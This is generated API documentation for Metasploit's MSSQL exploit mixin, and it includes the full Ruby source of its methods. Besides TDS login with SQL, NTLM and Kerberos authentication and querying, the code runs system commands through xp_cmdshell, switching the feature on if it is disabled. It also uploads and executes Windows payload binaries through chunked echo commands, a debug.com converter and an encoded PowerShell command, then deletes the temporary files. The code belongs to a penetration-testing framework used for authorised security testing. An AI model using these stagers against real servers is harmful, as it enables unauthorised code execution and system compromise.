Module: Msf::Exploit::Remote::MSSQL

Includes:: Exploit::Remote::NTLM::Client, Metasploit::Framework::MSSQL::Base, Kerberos::ServiceAuthenticator::Options, Kerberos::Ticket::Storage, MSSQL_COMMANDS, Tcp, Udp

Defined in:: lib/msf/core/exploit/remote/mssql.rb

Overview

This module exposes methods for querying a remote MSSQL service

Constant Summary

Constants included from Metasploit::Framework::MSSQL::Base

Instance Attribute Summary

Attributes included from Tcp

#sock

Attributes included from Udp

#udp_sock

Instance Method Summary collapse

#initialize(info = {}) ⇒ Object

Creates an instance of a MSSQL exploit module.
#mssql_login(user = 'sa', pass = '', db = '') ⇒ Object

This method connects to the server over TCP and attempts to authenticate with the supplied username and password The global socket is used and left connected after auth.
#mssql_login_datastore(db = '') ⇒ Object

Login to the SQL server using the standard USERNAME/PASSWORD options.
#mssql_ping(timeout = 5) ⇒ Object

This method sends a UDP query packet to the server and parses out the reply packet into a hash.
#mssql_ping_parse(data) ⇒ Object

Parse a ‘ping’ response and format as a hash.
#mssql_prelogin(enc_error = false) ⇒ Object

this method send a prelogin packet and check if encryption is off.
#mssql_print_reply(info) ⇒ Object

Nicely print the results of a SQL query.
#mssql_query(sqla, doprint = false, opts = {}) ⇒ Object

Issue a SQL query using the TDS protocol.
#mssql_upload_exec(exe, debug = false) ⇒ Object

Upload and execute a Windows binary through MSSQL queries.
#mssql_xpcmdshell(cmd, doprint = false, opts = {}) ⇒ Object

Execute a system command via xp_cmdshell.
#powershell_upload_exec(exe, debug = false) ⇒ Object

Upload and execute a Windows binary through MSSQL queries and Powershell.

Instance Method Details

#initialize(info = {}) ⇒ `Object`

Creates an instance of a MSSQL exploit module.

# File 'lib/msf/core/exploit/remote/mssql.rb', line 25

def initialize(info = {})
  super

  # Register the options that all MSSQL exploits may make use of.
  register_options(
    [
      Opt::RHOST,
      Opt::RPORT(1433),
      OptString.new('USERNAME', [ false, 'The username to authenticate as', 'sa']),
      OptString.new('PASSWORD', [ false, 'The password for the specified username', '']),
      OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]),
      OptBool.new('USE_WINDOWS_AUTHENT', [ true, 'Use windows authentication (requires DOMAIN option set)', false]),
    ], Msf::Exploit::Remote::MSSQL)
  register_advanced_options(
    [
      OptPath.new('HEX2BINARY',   [ false, "The path to the hex2binary script on the disk",
        File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
      ]),
      OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'], aliases: ['MssqlDomain']),
      *kerberos_storage_options(protocol: 'Mssql'),
      *kerberos_auth_options(protocol: 'Mssql', auth_methods: Msf::Exploit::Remote::AuthOption::MSSQL_OPTIONS),
    ], Msf::Exploit::Remote::MSSQL)
  register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ])
  register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
end

#mssql_login(user = 'sa', pass = '', db = '') ⇒ `Object`

This method connects to the server over TCP and attempts to authenticate with the supplied username and password The global socket is used and left connected after auth

# File 'lib/msf/core/exploit/remote/mssql.rb', line 299

def mssql_login(user='sa', pass='', db='')

  disconnect if self.sock
  connect

  begin
    # Send a prelogin packet and check that encryption is not enabled
    if mssql_prelogin != ENCRYPT_NOT_SUP
      print_error('Encryption is not supported')
      return false
    end
  rescue EOFError
    print_error('Probable server or network failure')
    return false
  end

  if datastore['Mssql::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
    idx = 0
    pkt = ''
    pkt_hdr = ''
    pkt_hdr =  [
      TYPE_TDS7_LOGIN, #type
      STATUS_END_OF_MESSAGE, #status
      0x0000, #length
      0x0000, # SPID
      0x01,   # PacketID (unused upon specification
      # but ms network monitor still prefer 1 to decode correctly, wireshark don't care)
      0x00   #Window
    ]

    pkt << [
      0x00000000,   # Size
      0x71000001,   # TDS Version
      0x00000000,   # Dummy Size
      0x00000007,   # Version
      rand(1024+1), # PID
      0x00000000,   # ConnectionID
      0xe0,         # Option Flags 1
      0x83,         # Option Flags 2
      0x00,         # SQL Type Flags
      0x00,         # Reserved Flags
      0x00000000,   # Time Zone
      0x00000000    # Collation
    ].pack('VVVVVVCCCCVV')

    cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
    aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
    sname = Rex::Text.to_unicode( rhost )

    fail_with(Msf::Exploit::Failure::BadConfig, 'The Mssql::Rhostname option is required when using Kerberos authentication.') if datastore['Mssql::Rhostname'].blank?
    fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
    fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
    offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['MssqlKrbOfferedEncryptionTypes'])
    fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?

    kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
      host: datastore['DomainControllerRhost'],
      hostname: datastore['Mssql::Rhostname'],
      proxies: datastore['Proxies'],
      mssql_port: rport,
      realm: datastore['MssqlDomain'],
      username: datastore['username'],
      password: datastore['password'],
      framework: framework,
      framework_module: self,
      cache_file: datastore['Mssql::Krb5Ccname'].blank? ? nil : datastore['Mssql::Krb5Ccname'],
      ticket_storage: kerberos_ticket_storage,
      offered_etypes: offered_etypes
    )

    kerberos_result = kerberos_authenticator.authenticate
    ssp_security_blob = kerberos_result[:security_blob]

    idx = pkt.size + 50 # lengths below

    pkt << [idx, cname.length / 2].pack('vv')
    idx += cname.length

    pkt << [0, 0].pack('vv') # User length offset must be 0
    pkt << [0, 0].pack('vv') # Password length offset must be 0

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, sname.length / 2].pack('vv')
    idx += sname.length

    pkt << [0, 0].pack('vv') # unused

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, 0].pack('vv') # locales

    pkt << [idx, 0].pack('vv') #db

    # ClientID (should be mac address)
    pkt << Rex::Text.rand_text(6)

    # SSP
    pkt << [idx, ssp_security_blob.length].pack('vv')
    idx += ssp_security_blob.length

    pkt << [idx, 0].pack('vv') # AtchDBFile

    pkt << cname
    pkt << aname
    pkt << sname
    pkt << aname
    pkt << ssp_security_blob

    # Total packet length
    pkt[0, 4] = [pkt.length].pack('V')

    pkt_hdr[2] = pkt.length + 8

    pkt = pkt_hdr.pack("CCnnCC") + pkt

    # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
    # has a strange behavior that differs from the specifications
    # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
    # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentication
    resp = mssql_send_recv(pkt, 15, false)

    info = {:errors => []}
    info = mssql_parse_reply(resp, info)

    return false if not info
    return info[:login_ack] ? true : false
  elsif datastore['Mssql::Auth'] == Msf::Exploit::Remote::AuthOption::NTLM || datastore['USE_WINDOWS_AUTHENT']
    idx = 0
    pkt = ''
    pkt_hdr = ''
    pkt_hdr =  [
        TYPE_TDS7_LOGIN, #type
        STATUS_END_OF_MESSAGE, #status
        0x0000, #length
        0x0000, # SPID
        0x01,   # PacketID (unused upon specification
          # but ms network monitor still prefer 1 to decode correctly, wireshark don't care)
        0x00   #Window
        ]

    pkt << [
      0x00000000,   # Size
      0x71000001,   # TDS Version
      0x00000000,   # Dummy Size
      0x00000007,   # Version
      rand(1024+1), # PID
      0x00000000,   # ConnectionID
      0xe0,         # Option Flags 1
      0x83,         # Option Flags 2
      0x00,         # SQL Type Flags
      0x00,         # Reserved Flags
      0x00000000,   # Time Zone
      0x00000000    # Collation
    ].pack('VVVVVVCCCCVV')

    cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
    aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
    sname = Rex::Text.to_unicode( rhost )
    dname = Rex::Text.to_unicode( db )

    workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)

    ntlm_client = ::Net::NTLM::Client.new(
      user,
      pass,
      workstation: workstation_name,
      domain: datastore['DOMAIN'],
    )
    type1 = ntlm_client.init_context
    # SQL 2012, at least, does not support KEY_EXCHANGE
    type1.flag &= ~ ::Net::NTLM::FLAGS[:KEY_EXCHANGE]
    ntlmsspblob = type1.serialize

    idx = pkt.size + 50 # lengths below

    pkt << [idx, cname.length / 2].pack('vv')
    idx += cname.length

    pkt << [0, 0].pack('vv') # User length offset must be 0
    pkt << [0, 0].pack('vv') # Password length offset must be 0

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, sname.length / 2].pack('vv')
    idx += sname.length

    pkt << [0, 0].pack('vv') # unused

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, 0].pack('vv') # locales

    pkt << [idx, 0].pack('vv') #db

    # ClientID (should be mac address)
    pkt << Rex::Text.rand_text(6)

    # NTLMSSP
    pkt << [idx, ntlmsspblob.length].pack('vv')
    idx += ntlmsspblob.length

    pkt << [idx, 0].pack('vv') # AtchDBFile

    pkt << cname
    pkt << aname
    pkt << sname
    pkt << aname
    pkt << ntlmsspblob

    # Total packet length
    pkt[0, 4] = [pkt.length].pack('V')

    pkt_hdr[2] = pkt.length + 8

    pkt = pkt_hdr.pack("CCnnCC") + pkt

    # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
    # has a strange behavior that differs from the specifications
    # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
    # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentication
    resp = mssql_send_recv(pkt, 15, false)

    unless resp.include?("NTLMSSP")
      info = {:errors => []}
      mssql_parse_reply(resp, info)
      mssql_print_reply(info)
      return false
    end

    # Get default data
    resp = resp[3..-1]
    type3 = ntlm_client.init_context([resp].pack('m'))
    type3_blob = type3.serialize

    # Create an SSPIMessage
    idx = 0
    pkt = ''
    pkt_hdr = ''
    pkt_hdr = [
      TYPE_SSPI_MESSAGE, #type
      STATUS_END_OF_MESSAGE, #status
      0x0000, #length
      0x0000, # SPID
      0x01, # PacketID
      0x00 #Window
    ]

    pkt_hdr[2] = type3_blob.length + 8

    pkt = pkt_hdr.pack("CCnnCC") + type3_blob

    resp = mssql_send_recv(pkt)


  #SQL Server authentication
  else
    idx = 0
    pkt = ''
    pkt << [
      0x00000000,   # Dummy size

      0x71000001,   # TDS Version
      0x00000000,   # Size
      0x00000007,   # Version
      rand(1024+1), # PID
      0x00000000,   # ConnectionID
      0xe0,         # Option Flags 1
      0x03,         # Option Flags 2
      0x00,         # SQL Type Flags
      0x00,         # Reserved Flags
      0x00000000,   # Time Zone
      0x00000000    # Collation
    ].pack('VVVVVVCCCCVV')


    cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
    uname = Rex::Text.to_unicode( user )
    pname = mssql_tds_encrypt( pass )
    aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
    sname = Rex::Text.to_unicode( rhost )
    dname = Rex::Text.to_unicode( db )

    idx = pkt.size + 50 # lengths below

    pkt << [idx, cname.length / 2].pack('vv')
    idx += cname.length

    pkt << [idx, uname.length / 2].pack('vv')
    idx += uname.length

    pkt << [idx, pname.length / 2].pack('vv')
    idx += pname.length

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, sname.length / 2].pack('vv')
    idx += sname.length

    pkt << [0, 0].pack('vv')

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, 0].pack('vv')

    pkt << [idx, dname.length / 2].pack('vv')
    idx += dname.length

    # The total length has to be embedded twice more here
    pkt << [
      0,
      0,
      0x12345678,
      0x12345678
    ].pack('vVVV')

    pkt << cname
    pkt << uname
    pkt << pname
    pkt << aname
    pkt << sname
    pkt << aname
    pkt << dname

    # Total packet length
    pkt[0, 4] = [pkt.length].pack('V')

    # Embedded packet lengths
    pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2

    # Packet header and total length including header
    pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt

    begin
      resp = mssql_send_recv(pkt)
    rescue EOFError
      print_error('Probable server or network failure')
      return false
    end
  end

  info = {:errors => []}
  info = mssql_parse_reply(resp, info)

  return false if not info
  info[:login_ack] ? true : false
end

#mssql_login_datastore(db = '') ⇒ `Object`



656
657
658

# File 'lib/msf/core/exploit/remote/mssql.rb', line 656

def mssql_login_datastore(db='')
  mssql_login(datastore['USERNAME'], datastore['PASSWORD'], db)
end

#mssql_ping(timeout = 5) ⇒ `Object`

This method sends a UDP query packet to the server and parses out the reply packet into a hash

# File 'lib/msf/core/exploit/remote/mssql.rb', line 56

def mssql_ping(timeout=5)
  data = { }

  ping_sock = Rex::Socket::Udp.create(
    'PeerHost'  => rhost,
    'PeerPort'  => 1434,
    'Context'   =>
      {
        'Msf'        => framework,
        'MsfExploit' => self,
      })

  ping_sock.put("\x02")
  resp, _saddr, _sport = ping_sock.recvfrom(65535, timeout)
  ping_sock.close

  return data if not resp
  return data if resp.length == 0

  return mssql_ping_parse(resp)
end

#mssql_ping_parse(data) ⇒ `Object`

Parse a ‘ping’ response and format as a hash

# File 'lib/msf/core/exploit/remote/mssql.rb', line 81

def mssql_ping_parse(data)
  res = []
  var = nil
  idx = data.index('ServerName')
  return res if not idx
  sdata = data[idx, (data.length - 1)]

  instances = sdata.split(';;')
  instances.each do |instance|
    rinst = {}
    instance.split(';').each do |d|
      if (not var)
        var = d
      else
        if (var.length > 0)
          rinst[var] = d
          var = nil
        end
      end
    end
    res << rinst
  end

  return res
end

#mssql_prelogin(enc_error = false) ⇒ `Object`

this method send a prelogin packet and check if encryption is off

# File 'lib/msf/core/exploit/remote/mssql.rb', line 213

def mssql_prelogin(enc_error=false)

  pkt = ""
  pkt_hdr = ""
  pkt_data_token = ""
  pkt_data = ""


  pkt_hdr =  [
    TYPE_PRE_LOGIN_MESSAGE, #type
    STATUS_END_OF_MESSAGE, #status
    0x0000, #length
    0x0000, # SPID
    0x00, # PacketID
    0x00 #Window
  ]

  version = [0x55010008, 0x0000].pack("Vv")
  encryption = ENCRYPT_NOT_SUP # off
  instoptdata = "MSSQLServer\0"

  threadid =   "\0\0" + Rex::Text.rand_text(2)

  idx = 21 # size of pkt_data_token
  pkt_data_token <<  [
    0x00, # Token 0 type Version
    idx, # VersionOffset
    version.length, # VersionLength

    0x01, # Token 1 type Encryption
    idx = idx + version.length, # EncryptionOffset
    0x01, # EncryptionLength

    0x02, # Token 2 type InstOpt
    idx = idx + 1, # InstOptOffset
    instoptdata.length, # InstOptLength

    0x03, # Token 3 type Threadid
    idx + instoptdata.length, # ThreadIdOffset
    0x04, # ThreadIdLength

    0xFF
  ].pack("CnnCnnCnnCnnC")

  pkt_data << pkt_data_token
  pkt_data << version
  pkt_data << encryption
  pkt_data << instoptdata
  pkt_data << threadid

  pkt_hdr[2] = pkt_data.length + 8

  pkt = pkt_hdr.pack("CCnnCC") + pkt_data

  resp = mssql_send_recv(pkt)

  idx = 0

  while resp && resp[0, 1] != "\xff" && resp.length > 5
    token = resp.slice!(0, 5)
    token = token.unpack("Cnn")
    idx -= 5
    if token[0] == 0x01
      idx += token[1]
      break
    end
  end

  if idx > 0
    encryption_mode = resp[idx, 1].unpack("C")[0]
  else
    # force to ENCRYPT_NOT_SUP and hope for the best
    encryption_mode = ENCRYPT_NOT_SUP
  end

  if encryption_mode != ENCRYPT_NOT_SUP && enc_error
    raise RuntimeError,"Encryption is not supported"
  end
  encryption_mode
end

#mssql_print_reply(info) ⇒ `Object`

Nicely print the results of a SQL query

# File 'lib/msf/core/exploit/remote/mssql.rb', line 695

def mssql_print_reply(info)

  print_status("SQL Query: #{info[:sql]}")

  if info[:done] && info[:done][:rows].to_i > 0
    print_status("Row Count: #{info[:done][:rows]} (Status: #{info[:done][:status]} Command: #{info[:done][:cmd]})")
  end

  if info[:errors] && !info[:errors].empty?
    info[:errors].each do |err|
      print_error(err)
    end
  end

  if info[:rows] && !info[:rows].empty?

    tbl = Rex::Text::Table.new(
      'Indent'    => 1,
      'Header'    => "",
      'Columns'   => info[:colnames],
      'SortIndex' => -1
    )

    info[:rows].each do |row|
      tbl << row
    end

    print_line(tbl.to_s)
  end
end

#mssql_query(sqla, doprint = false, opts = {}) ⇒ `Object`

Issue a SQL query using the TDS protocol

# File 'lib/msf/core/exploit/remote/mssql.rb', line 663

def mssql_query(sqla, doprint=false, opts={})
  info = { :sql => sqla }

  opts[:timeout] ||= 15

  pkts = []
  idx  = 0

  bsize = 4096 - 8
  chan  = 0

  @cnt ||= 0
  @cnt += 1

  sql = Rex::Text.to_unicode(sqla)
  while(idx < sql.length)
    buf = sql[idx, bsize]
    flg = buf.length < bsize ? "\x01" : "\x00"
    pkts << "\x01" + flg + [buf.length + 8].pack('n') + [chan].pack('n') + [@cnt].pack('C') + "\x00" + buf
    idx += bsize

  end

  resp = mssql_send_recv(pkts.join, opts[:timeout])
  mssql_parse_reply(resp, info)
  mssql_print_reply(info) if doprint
  info
end

#mssql_upload_exec(exe, debug = false) ⇒ `Object`

Upload and execute a Windows binary through MSSQL queries

# File 'lib/msf/core/exploit/remote/mssql.rb', line 143

def mssql_upload_exec(exe, debug=false)
  hex = exe.unpack("H*")[0]

  var_bypass  = rand_text_alpha(8)
  var_payload = rand_text_alpha(8)

  print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
  print_status("Writing the debug.com loader to the disk...")
  h2b = File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY']))
  h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
  h2b.split(/\n/).each do |line|
    mssql_xpcmdshell("#{line}", false)
  end

  print_status("Converting the debug script to an executable...")
  mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug)
  mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug)

  print_status("Uploading the payload, please be patient...")
  idx = 0
  cnt = 500
  while(idx < hex.length - 1)
    mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
    idx += cnt
  end

  print_status("Converting the encoded payload...")
  mssql_xpcmdshell("%TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
  mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug)
  mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)

  print_status("Executing the payload...")
  mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
end

#mssql_xpcmdshell(cmd, doprint = false, opts = {}) ⇒ `Object`

Execute a system command via xp_cmdshell

# File 'lib/msf/core/exploit/remote/mssql.rb', line 110

def mssql_xpcmdshell(cmd, doprint=false, opts={})
  force_enable = false
  begin
    res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", false, opts)
    if res[:errors] && !res[:errors].empty?
      if res[:errors].join =~ /xp_cmdshell/
        if force_enable
          print_error("The xp_cmdshell procedure is not available and could not be enabled")
          raise RuntimeError, "Failed to execute command"
        else
          print_status("The server may have xp_cmdshell disabled, trying to enable it...")
          mssql_query(mssql_xpcmdshell_enable())
          raise RuntimeError, "xp_cmdshell disabled"
        end
      end
    end

    mssql_print_reply(res) if doprint

    return res

  rescue RuntimeError => e
    if e.to_s =~ /xp_cmdshell disabled/
      force_enable = true
      retry
    end
    raise e
  end
end

#powershell_upload_exec(exe, debug = false) ⇒ `Object`

Upload and execute a Windows binary through MSSQL queries and Powershell

# File 'lib/msf/core/exploit/remote/mssql.rb', line 182

def powershell_upload_exec(exe, debug=false)

  # hex converter
  hex = exe.unpack("H*")[0]
  # create random alpha 8 character names
  #var_bypass  = rand_text_alpha(8)
  var_payload = rand_text_alpha(8)
  print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
  # our payload converter, grabs a hex file and converts it to binary for us through powershell
  h2b = "$s = gc 'C:\\Windows\\Temp\\#{var_payload}';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\#{var_payload}.exe',$b)"
  h2b_unicode=Rex::Text.to_unicode(h2b)
  # base64 encode it, this allows us to perform execution through powershell without registry changes
  h2b_encoded = Rex::Text.encode_base64(h2b_unicode)
  print_status("Uploading the payload #{var_payload}, please be patient...")
  idx = 0
  cnt = 500
  while(idx < hex.length - 1)
    mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
    idx += cnt
  end
  print_status("Converting the payload utilizing PowerShell EncodedCommand...")
  mssql_xpcmdshell("powershell -EncodedCommand #{h2b_encoded}", debug)
  mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
  print_status("Executing the payload...")
  mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
  print_status("Be sure to cleanup #{var_payload}.exe...")
end

Module: Msf::Exploit::Remote::MSSQL

Overview

Constant Summary

Constants included from Metasploit::Framework::MSSQL::Base

Instance Attribute Summary

Attributes included from Tcp

Attributes included from Udp

Instance Method Summary collapse

Methods included from Kerberos::ServiceAuthenticator::Options

Methods included from Kerberos::Ticket::Storage

Methods included from Metasploit::Framework::MSSQL::Base

Methods included from Tcp

Methods included from Udp

Methods included from MSSQL_COMMANDS

Instance Method Details

#initialize(info = {}) ⇒ Object

#mssql_login(user = 'sa', pass = '', db = '') ⇒ Object

#mssql_login_datastore(db = '') ⇒ Object

#mssql_ping(timeout = 5) ⇒ Object

#mssql_ping_parse(data) ⇒ Object

#mssql_prelogin(enc_error = false) ⇒ Object

#mssql_print_reply(info) ⇒ Object

#mssql_query(sqla, doprint = false, opts = {}) ⇒ Object

#mssql_upload_exec(exe, debug = false) ⇒ Object

#mssql_xpcmdshell(cmd, doprint = false, opts = {}) ⇒ Object

#powershell_upload_exec(exe, debug = false) ⇒ Object